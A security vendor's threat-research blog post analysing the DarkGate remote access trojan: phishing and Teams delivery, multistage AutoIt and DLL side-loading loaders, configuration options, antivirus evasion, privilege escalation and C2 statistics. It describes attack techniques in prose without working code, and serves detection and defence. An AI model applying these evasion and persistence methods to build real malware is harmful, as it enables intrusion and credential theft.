The latest cybersecurity trends, best practices, security vulnerabilities, and more
The Continued Evolution of the DarkGate Malware-as-a-Service
On September 2023, the Trellix Security Operations Center (SOC) successfully detected and stopped an attack against Musaruba, the holding company for Trellix and Skyhigh Security, involving an emerging malware family named DarkGate. First discovered in 2018, DarkGate is a Remote Access Trojan (RAT) that enables attackers to fully compromise victim systems. The software is developed and sold as Malware-as-a-Service (MaaS) by an actor known as RastaFarEye on underground cybercrime forums.
A few months ago, in June, this actor released DarkGate version 4, which leveraged extensive evasion techniques, command and control capabilities, and various modules for credential theft, keylogging, screen capturing, and more. All of these characteristics caught the attention of cybercriminals, which started to acquire the tool and compromise systems of companies and users from all over the world. Moreover, during previous months, RastaFarEye has continuously developed DarkGate to bypass security products based on analysis published by security vendors and researchers.
To better understand the DarkGate threat, the Trellix Advanced Research Center analyzed versions 4.6, 4.10.2, 4.17b, and the latest 5.0.19, mapping the rapid evolution of the malware.
DarkGate is a complete toolkit that provides attackers with extensive capabilities to fully compromise victim systems. It is being developed by the underground user RastaFarEye who offers DarkGate through a subscription-based model costing up to $15,000 per month, justifying the high price tag by claiming the malware has been under continual development since 2017.
One of the first samples was discovered by Fortinet in 2018, a novel malware that was used to mine cryptocurrencies and deploy ransomware. However, the malware did not gain widespread popularity until 2021, when an updated version was discovered by Avast, which dubbed the malware as MehCrypter. This version already included many techniques that we have seen in the current version of DarkGate , like the usage of AutoIt to load the final payload or a full RAT module to control remote systems.
In June 2023, RastaFarEye advertised the latest version of DarkGate on the forums mentioned earlier, including new features such as hVNC, file manager, Discord and Browser stealer, keylogger, and a rootkit module, etc. The developer promised total evasion of any security products, with a complete command and control panel for convenient control of the bots by buyers.
In August 2023, several security companies and researchers discovered the first campaigns using DarkGate v4. To aid future research, they published their analysis and decryption tools. This caught the attention of RastaFarEye, who published an updated version of the malware to evade them.
RastaFarEye continually pushes minor DarkGate updates to evade antivirus detections, introduce new features, and fix bugs. On September 29th RastaFarEye announced that he was working on the next major version of DarkGate, version 5, to be released during October due to growing attention on the malware from security vendors and researchers. This release was advertised to be big, with a complete rework of the main code.
Malware Delivery Channels
DarkGate campaigns primarily leverage phishing emails containing links to distribute the initial infection vector, which will be either a Visual Basic Script (VBS) or Microsoft Software Installer (MSI) file.
However, in some campaigns, DarkGate has started to use a new way to deploy the initial stage via collaborative applications such as Microsoft Teams, something Trellix's SOC detected targeting Musaruba, which is the holding company for Trellix and Skyhigh Security.
The attacker, who claimed to be a senior executive at Musaruba , sent a Teams message containing a link to a set of employees. The link led to a ZIP file that was hosted within SharePoint, however, in an attempt to prevent researchers from analyzing the file, only the employees who received the message could access. Trellix has a variety of security controls deployed that ensure proper defense in-depth, Trellix has a variety of security controls deployed that ensure proper defense-in-depth however, it was Trellix IVX for Collaboration Platforms that picked up the DarkGate infection attempts, alerting our SOC.
This ZIP compressed file contained five Windows shortcut or LNK files trying to masquerade a PDF file using the double extension method, ".pdf.lnk". Also, these files used a deceptive PDF icon to lure unsuspecting users into executing the file.
These files contained a Windows Batch script that will run the Window’s "curl" utility to retrieve a VBS script from a remote server and the Windows Script Host using the "CScript.exe" utility to execute it.
DarkGate version 4 execution chain starts with either a VBS script or a MSI file, which will drop and execute further stages. Regardless of the infection vectors, the following stages stay the same.
For the initial stage, DarkGate used two main attack vectors, one involving a VBS script and the other a MSI file.
The initial VBS dropper contains obfuscated code within approximately 30 lines of script. When executed, this downloads and executes a Windows batch script from the command and control (C&C) server.
The batch script creates a directory with a random name in "C:\" root drive, copies and renames the Windows "curl" utility into this folder. It then leverages the renamed curl to download a legitimate AutoIT executable and a compiled AutoIT script from the C&C to execute it.
An alternative infection vector comes in the form of a MSI file. This contains a Windows Cabinet (CAB) archive storing the previously mentioned AutoIT payload components. In later DarkGate versions, the CAB instead holds a weaponized DLL and signed executable for DLL side-loading technique.
AutoIT provides a scripting language to automate Windows GUI interactions and general scripting capabilities. The compiled AutoIT script contains several chunks:
- A large 650KB chunk of data preceding the actual script
- The compiled AutoIT script
- A smaller about 100KB chunk of data following the script
The script is delimited by the AutoIT magic number "AU3!EA06".
When decompiled using the open source-project myAut2Exe it contains a hexadecimal-encoded shellcode representation to execute the next payload stage. The Windows API CallWindowProc() function is leveraged to decode and launch the shellcode.
The shellcode is responsible for executing a PE file that acts as the DarkGate loader module. It accomplishes this by mapping the full PE file into memory and calling its entry point, with the "MZ" magic number indicating a valid PE format.
Executed solely in memory, the loader reads the first chunk of data from the AutoIT script.
This data contains four elements divided by the "|" character, the second is a key string that will be calculated, along with the third one: the base64 encrypted binary. It will be used by the loader to decrypt the DarkGate payload using an XOR operation.
Later versions (4.17b) employ custom Base64 decoding using a custom alphabet to decode the last stage. It uses the second data chunk as the alphabet and the third split as the encoded file.
Version 5 Enhancements
DarkGate version 5 introduces a new execution chain using DLL side-loading and enhanced shellcodes and loaders. However, it retains some version 4 features including VBS/MSI initial stages and AutoIT scripts.
The first stage of DarkGate version 5 is similar to version 4, it relies on a VBS script to download further stages or a MSI file to drop them. The execution flow differs between the VBS and MSI distribution vectors:
- The VBS version directly drops the AutoIT payload instead of a DLL/executable combination.
- The MSI version utilizes DLL side-loading, where a signed executable loads a malicious DLL.
We discovered a new DarkGate v5 infection vector using DLL side-loading, where a legitimate app loads a malicious DLL. In this case, the KeyScrambler application loads a trojanized DarkGate version of "KeyScramblerE.dll" library.
The DLL has 21 dummy exports to appear normal. The real malicious code is executed in the DLL entry point, which contains a XOR decryption routine to extract and execute a shellcode payload.
The updated shellcode uses the curl utility to retrieve the next-stage AutoIT executable, similar to version 4.
The dropped AutoIT binary looks similar to the AutoIT script from version 4. However, in this case, the loader is not a Base64 encoded PE file, but a hardcoded shellcode instead.
DarkGate v5 introduces a new shellcode loader that downloads, decrypts, and executes the final payload. Unlike previous versions, the XOR decryption key is extracted from the first 8 bytes of the downloaded data rather than being hardcoded. This new stealthier loader presents the incremental improvements in DarkGate's multistage infection chain. The developer continuously modifies tactics to increase stealth, hinder analysis, and evade security defenses.
DarkGate malware payload
The DarkGate payload is a modular sample that contains many functionalities to fully control a remote system. Since the release of version 4 in June 2023, DarkGate has received different updates and fixes to try to overcome the security tools the community has developed, something important for its customers, who pay a generous amount of money for it.
In the following lines, we will describe the different changes to DarkGate in the latest months. To do so, we have analyzed different versions of DarkGate, including one of the latest samples, discovered in October 2023.
DarkGate contains multiple readable strings to operate. However, these strings are encoded in all versions, except v5.0.19 which only encodes a few ones like the C&C URL. This encoding follows the same approach, a Base64 encoding with custom alphabets: one to encode the configuration and another to encode general purpose strings.
DarkGate 4.6 used different ASCII versions of the alphabet, in this example the alphabets were the following.
This approach resulted in every encoded string being in ASCII format, something the security community’s tools had in mind to decode them. Nevertheless, to try to break these security tools, the DarkGate developer modified the encoding by setting a non-ASCII alphabet to encode general purpose strings. However, it maintained the same alphabet for the configuration string, but added a Zlib compression prior encoding it. These changes resulted in encoded strings that were not in ASCII format. This disruption forced security tools to adapt. The alphabets of the 4.17b sample were the following:
In the case of version 5.0.19, only one alphabet is used, which is the same as the "configuration" one in previous versions. However, as mentioned earlier, it is used in a few cases.
The configuration string includes different parameters that are used by DarkGate to enable or disable various features. The configuration originally had 19 entries, but latest samples, version 4.17b and 5.0.19, show at least 27 parameters whose identifiers (ID) go from 0 to 29, omitting 20 and 21 IDs. In the following table a one-to-one comparison is made between the configuration of all the samples:
These parameters can be translated as follows (the names recovered from the samples are highlighted in bold):
- Port number used to communicate with the C&C server.
- startup: the binary will create a copy of itself in the Startup folder "%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" and create a registry key under "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" as persistence mechanism.
- rootkit: the binary will be able to inject code or binaries into different processes using process hollowing and portable executable injection techniques to evade security products.
- antivm: verifies if the current system is running under Virtual Box, VMware or Hyper-V machine by checking the display information of the system.
- Numerical value that represents the minimum amount of free disk space needed to run DarkGate.
- antidisk: Checks the free disk space available in the system. If the requirement defined in ID 4 is not met, DarkGate will not execute.
- antienv: checks different parameters like display and processor information to determine if the system is running in a virtual machine.
- Numerical value that represents the minimum amount of RAM needed to run DarkGate.
- antiram: checks the RAM size of the system. If the requirement defined in ID 7 is not met, DarkGate will not execute.
- Checks if the process of the current system is an Intel Xeon.
- internalmutex: string used as seed, along with the HWID identifier and the input text, to generate a unique string that will be used as an internal mutex.
- Indicates that the binary was distributed a raw stub, without packing.
- DarkGate InternalCrypter DLL: indicates that the binary was distributed packed/crypted inside a DLL.
- DarkGate InternalCrypter AU3: indicates that the binary was distributed packed/crypted inside an Autoit3 file.
- Unknown. In the samples we analyzed it was used as if the parameter was Boolean instead of integer and, if enabled, it checked the system's RAM size while doing cryptomining checks.
- Key used when the binary is crypted inside a DLL.
- Numeric value that represents the delay the sample will use to ping the C&C server.
- Checks if the process is being debugged checking the "BeingDebugged" flag in the PEB structure. This feature was missing in latest samples, even when it was enabled in the configuration.
- Unknown. The analyzed samples lacked this feature. Moreover, they had the parameter enabled, but the own sample disabled it on runtime.
- Creates persistence copying the file to %LOCALAPPDATA% path and setting the path as value in the registry key "SOFTWARE\Microsoft\Windows\CurrentVersion\Run".
- Enables the "binder" feature, which listens for an encoded binary that will be stored in the file system or executed using process hollowing, pe injection, or "ShellExecuteExA" function. In some samples this parameter is missing.
- String value that is appended to the end of string that contains the system information gathered by DarkGate. In some samples this parameter is missing.
- Port number used by the cryptomining module to communicate with the C&C server.
- username: the username that will be used by the sample.
- Sends the installation path of DarkGate to the C&C server after trying to elevate privileges.
- Numeric value that represents the total amount of time, in minutes, the sample will hear for specific commands on a different thread.
- Unknown. Despite being included in the configuration, it was missing in the samples.
- If enabled, writes/reads hashed system information to/from a file stored in APPDATA,
- Enables Kaspersky security product bypass using process injection.
- Unknown. Despite being included in the configuration, it was missing in the samples.
Many options have been included in the configuration structure since the first samples from 2023, some of them being not developed or without a clear purpose, suggesting that these features are in an early development state.
DarkGate implements a wide variety of commands, many of them being commonly seen in RAT samples. Since many functionalities are commonly seen in malware, this analysis focuses on novel capabilities related to evasion, anti-analysis, and privilege escalation.
To escalate privileges, DarkGate will perform two different approaches depending on the used crypter:
- If the binary does not use any kind of crypter, ID 11 (raw stub option), it will try to simply elevate privileges to SYSTEM using the Sysinternals tool PsExec as follows:
- In case any of the two available crypters are used, DarkGate will try to elevate privileges using the process hollowing technique. The binary will request the CnC the binary to be injected into notepad.exe, which we suspect it will perform the elevation and the relaunching of the application. However, we did not successfully retrieve such binary.
DarkGate claims to contain a rootkit module that makes it completely hidden from tools such as Task Manager or Process Explorer, which will only be executed if the configuration ID 2 is enabled. Despite rootkit claims, DarkGate does not implement kernel hooking. It relies on process injection and parent PID spoofing to hide its process from monitoring tools.
This approach may have been used to prevent antivirus software from detecting the sample, since many of them look for hooks being implanted in memory. However, it is worth mentioning that process injection techniques are widely detected too. The Threat actor seems to be aware of that, thus some techniques are only executed if a specific antivirus is not installed.
August 30th RastaFarEye posted an update stating that now DarkGate supports Kaspersky Endpoint AV and Internet Security bypassing, along with mechanisms to prevent Russian-speaking countries from being infected by the malware.
Version 5 was announced later in September to be released during October. This new version would come with many features and changes compared to previous versions. However, the DarkGate v 5 sample we could retrieve did not present major changes, only the previous stages were reworked or NetPass RDP password recovery command, to mention some. Also, some key features like the string encoding or the DLL crypter module are missing, which may indicate that this sample belongs to a work in progress version.
On October 1st the different features this new version will include were revealed and it was mentioned that this version would be released the October 11th, which may confirm why the sample we retrieved the October 10th lacked so many features.
Recent DarkGate versions since v4.13 implement functionality to bypass Kaspersky endpoint and antivirus products.
DarkGate first checks if the Autoit3 crypter (ID 13) and persistence settings (ID 1) are enabled. It then decodes a shellcode from the AutoIT payload that relaunches DarkGate in a new process, evading EDR detection.
DarkGate decodes a shellcode from the Autoit3 file that contains the encoded version of DarkGate using the same Base64 encoding table (the second element), and the fourth element of the split chunk data as the encoded data.
The shellcode works similar to the one seen in the initial stages. It executes a PE file stored in variables. This PE file will decode and execute the DarkGate payload stored in the Autoit3 file in the same way as the initial stages. This execution will work as a restart, but on a different process.
Bypassing Kaspersky AV
DarkGate uses the Autoit3.exe process that launched the DarkGate payload to inject itself, which will result in the alleged bypass of Kaspersky security products.
Additional evasion methods such as Parent PID (PPID) spoofing and process hollowing aim to thwart other antivirus products such as Avast, AVG or Bitdefender. The developer boasted of AV evasion, yet detections remain viable.
Commonwealth of Independent States (CIS) countries check
To prevent DarkGate execution in Russian-speaking countries, the binary uses the common approach of checking the Locale System Default (LCID) information of Windows systems using the Windows API function GetSystemDefaultLCID.
However, some announced evasion capabilities contradict observed behaviors. Version 4.10 blocked CIS countries, but newer versions (4.13, 4.17b, and 5.0.19) lack this check despite claims.
NetPass RDP password recovery
Version 5 of DarkGate included a complete rework of the RDP password theft feature, including the Nirsoft tool, Network Password Recovery or NetPass tool.
Tracking DarkGate in the Wild
In our recent analysis of malware samples, we observed intriguing statistics related to their C&C servers. The chart provides a comprehensive breakdown of the malware samples distribution per threat actor. The top 5 threat actors based on C2 servers in our dataset are distinct, with each handling a significant number of samples. Notably, the C2 server 126.96.36.199 at the top of our list has the most DarkGate variant, indicating it as a major hub for DarkGate.
Threat actors are often cautious, avoiding potential traps such as malware sandbox environments and targets with low resources. Our statistics for evasion techniques demonstrate a clear preference among these threat actors for victims with more than 4GB of RAM and a 100GB hard drive. In this pattern, however, there is an outlier: the notably active threat actor operating from the IP address 188.8.131.52. This actor necessitates a broad range of required drive storage sizes, ranging this minimum value from 30GB to 99GB among multiple variants of the same group.
Our analysis visualized through a global heatmap; we uncovered patterns in detection hits across the globe. The United States led the chart with significant hits, underscoring its prominence in the dataset and indicating a heightened level of activity or interest in the region. Europe, garners attention with Germany and Italy emerging as keys to the significant hits from the continent. Regions in Asia such as Malaysia and Singapore, South America and Africa were not left behind, suggesting a global spread of DarkGate stealer malware.
RastaFarEye‘s DarkGate has shown to be more than just another piece of malware in our extensive analysis. It integrates a wide variety of functionalities to not only steal information from user’s systems and evade antivirus software, but also has created the different execution chains from scratch and a C&C panel to conduct the operations. Moreover, the threat actor has been actively monitoring threat reports to perform quick changes thus evading detections. Its adaptability, the speed with which it iterates, and the depth of its evasion methods attest to the sophistication of modern malware threats.
However, we discovered contradictions between what RastaFarEye mentioned in the forums and what s implemented in DarkGate version 5, such as the CIS countries exclusion in latest samples or the entire rework of the code. Nevertheless, the latter statement could be addressed with the fact the variant is still in development, which would explain why it lacks some features such as the string encoding.
DarkGate, charges a pricey monthly fee of $15,000, which represents a barrier to most potential buyers. Previously, it was reported that the tool's distribution was exclusive, with only 10 individuals obtaining it. This figure has grown to 30, which makes DarkGate a limited MaaS compared to other variants. Something we can check based on the prevalence of the previous versions where only a few reports were shared.
Nevertheless, DarkGate version 4 has attracted a lot of attention and has been massively spread all over the world. The hash IoCs, DLLs, shellcodes, and C&C servers presented in Annex highlight the vast infrastructure that supports DarkGate. It is crucial to underscore the significant cyber threat despite its constrained customer base.
Learn more about Trellix IVX for Collaboration Platforms.
Appendix A – Trellix DarkGate detection
Trellix IVX analysis
While DarkGate author has implemented many mechanisms to bypass endpoint security software, such as packers, encryption, obfuscation or syscalls, the core behavior of the trojan hasn’t changed radically over the years, apart from including new functionality.
Trellix Intelligent Virtual Execution (IVX) sandbox identifies attacks that evade traditional signature-based defenses by detonating suspicious files, web objects, URLs, and email attachments within a proprietary hypervisor instrumented for over 200 potential simultaneous executions.
Trellix IVX could detect and identify the latest DarkGate samples, based on its fundamental behavioral traits, some of which ironically were implemented to evade security and virtualization software.
Additionally, Trellix IVX provides detailed information about the malware activity, such as file system and registry modifications, network events and API calls. Also, it includes memory dumps of every spawned process, full network traffic and dumps of every dropped payload. These items can be used to visualize the activities of the trojan, which are mapped to a MITRE ATT&CK chart, get specific IOCs, and create custom YARA rules for additional threat hunting.
Trellix IVX is natively integrated with Trellix Network, Email and Endpoint products, which means that every single artifact (email, binary or URL) can be automatically sent to IVX for analysis. Additionally, IVX is compatible with platforms like Box, Dropbox, Teams, Slack, Amazon S3, or SharePoint, to mention some, so that, if DarkGate were distributed using one of these channels, it would be scanned by IVX automatically, preventing the user to be infected.
More information about Trellix IVX On-Premise, Virtual and Cloud sandbox offerings can be found in the following datasheets.
Trellix prevention guidelines
Detection as a Service
Suspicious Network Activity 10146
Suspicious Network Activity 10438
Suspicious Codeinjection Activity 10005
Suspicious File AVCheck Activity 10312
Appendix B – MITRE ATT&CK
Appendix C - IoCs
Shellcode to restart DarkGate
Nov 28, 2023
Board Support Remains Critical as Majority of CISOs Experience Repeat Cyber Attacks
Nov 27, 2023
Trellix Announces Cybersecurity Generative AI Innovations Powered by Amazon Bedrock
Nov 22, 2023
Trellix Hosts Zero Trust Strategy Virtual Forum
Nov 16, 2023
Trellix Detects Collaboration by Cybercriminals and Nation-States
Oct 30, 2023
Trellix Hosts Actionable Ransomware Detection and Response Virtual Showcase
The latest from our newsroom
By Brian B. Brown · October 16, 2023
Get a recap of key learnings from the Ransomware Detection and Response Virtual Summit and learn to protect your organization against ransomware attacks.
By Nico Devoti · October 9, 2023
Trellix SIA Business Development lead explains the evolution of Trellix Security Innovation Alliance (SIA) partner program, its unique benefits, and why this should be top of mind for customers.
Get the latest
We’re no strangers to cybersecurity. But we are a new company.
Stay up to date as we evolve.
Zero spam. Unsubscribe at any time.